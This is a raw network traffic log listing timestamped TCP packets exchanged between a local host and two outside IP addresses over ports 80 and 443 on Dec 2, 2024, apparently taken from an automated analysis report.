                                                  Dec 2, 2024 07:25:20.668369055 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.668418884 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.670018911 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.670124054 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.670172930 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.670202971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.670255899 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.670264006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.671909094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.672008038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.672055960 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.672852993 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.672905922 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.672914982 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.673672915 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.673717976 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.673764944 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.675543070 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.675554037 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.675595999 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.676207066 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.676265001 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.676275015 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.677321911 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.677333117 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.677375078 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.679121017 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.679243088 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.679289103 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.680933952 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.681143999 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.681194067 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.682749033 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.682873964 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.682930946 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.684571981 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.684688091 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.684736967 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.686386108 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.686502934 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.686549902 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.688205957 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.688322067 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.688386917 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.690028906 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.690114021 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.690161943 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.691910982 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.692086935 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.692133904 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.762826920 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.762852907 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.762917042 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.764355898 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.764470100 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.764518976 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.767720938 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.767740011 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.767785072 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.768810034 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.768830061 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.768877029 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.771850109 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771959066 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771991968 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.771998882 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.773746967 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.773786068 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.773981094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.775633097 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.775681973 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.775757074 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.777460098 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.777504921 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.777520895 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.779222012 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.779263973 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.779283047 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.781071901 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.781109095 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.781177044 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.782871962 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.782917023 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.782973051 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.784698963 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.784744978 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.784836054 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.786555052 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.786600113 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.786714077 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.788424015 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.788469076 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.788471937 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.790150881 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.790194035 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.790256023 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.792130947 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.792175055 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.792176962 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.793819904 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.793864965 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.793890953 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.795612097 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.795658112 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.795715094 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.797447920 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.797492027 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.797571898 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.799259901 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.799304962 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.799360037 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.801073074 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.801121950 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.833769083 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.833867073 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.833899975 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836445093 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836456060 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836481094 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836512089 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.836534977 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.836584091 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.839834929 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839863062 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839879990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.839910030 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.839927912 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.842403889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842411995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842434883 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.842461109 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.842494011 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.845062971 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845074892 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845089912 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.845122099 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.845149994 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.848486900 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848495007 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848519087 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.848546982 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.848573923 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.851164103 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.851171017 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.851217985 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.851233006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853780031 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853787899 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.853836060 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.853866100 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857120991 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857129097 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.857177019 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.857203960 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859853029 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859859943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.859913111 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.859944105 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862390995 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862425089 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862453938 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.862477064 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.862529039 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.865345001 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.865387917 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.865395069 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.865423918 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.865457058 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.865472078 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.865489006 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.866240025 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.866312027 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.866357088 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.868053913 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.868066072 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.868103981 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.868750095 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.868803024 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.868814945 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.869853973 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.869941950 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.869990110 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.871476889 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.871536016 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.871542931 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.871653080 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.871769905 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.871818066 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.873648882 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.873864889 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.873917103 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.874011040 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.874067068 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.874079943 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.875350952 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.875412941 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.875458956 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.877106905 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.877229929 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.877279997 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.877437115 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.877495050 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:20.877507925 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:20.878926039 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.878988028 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.879036903 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.880758047 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.880887985 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.880939960 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.882596016 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.882613897 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.882661104 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.884382963 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.884496927 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.884545088 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.886313915 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.886360884 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.886406898 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.888041019 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.888108969 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.888153076 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.889622927 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.889795065 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.889836073 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.891158104 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.891283989 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.891328096 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.892704964 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.892788887 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.892839909 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.894287109 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.894433975 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.894483089 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.896343946 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.896547079 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.896594048 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.897380114 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.897505045 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.897551060 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.899014950 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.899079084 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.899123907 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909240961 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909466982 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909482002 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909493923 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909503937 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909508944 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909516096 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909526110 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909528971 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909554005 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909637928 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909656048 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909679890 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909687042 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909701109 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909712076 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.909724951 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.909749985 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.911844969 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.911868095 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.911880016 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.911920071 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.911998987 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.912010908 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.912051916 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.913511038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.913635969 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.913687944 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.915009022 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.915115118 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.915169001 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.916549921 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.916709900 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.916759014 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.918104887 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.918190002 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.918246031 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.919573069 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.919698954 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.919745922 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.921098948 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.921209097 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.921255112 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.922697067 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.922796011 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.922836065 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.924128056 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.924308062 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.924354076 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.925621986 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.925715923 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.925757885 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.927151918 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.927335024 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.927376032 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.928594112 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.928719997 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.928757906 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.930084944 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.930191040 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.930231094 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.931587934 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.931749105 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.931790113 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.933084011 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.933227062 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.933276892 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.934575081 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.934684038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.934730053 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.936053038 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.936069965 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.936106920 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.937578917 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.937774897 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.937823057 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.939052105 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.939229965 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.939273119 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:20.940548897 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.940656900 CET8049173146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:25:20.940697908 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:21.008872032 CET4917380192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:25:21.034965992 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.035024881 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.035048962 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.037492990 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.037502050 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.037523985 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.037542105 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.037555933 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.037594080 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.040770054 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.040777922 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.040798903 CET44349172142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:21.040817022 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.040838957 CET49172443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:21.043345928 CET44349172142.215.209.77192.168.2.22
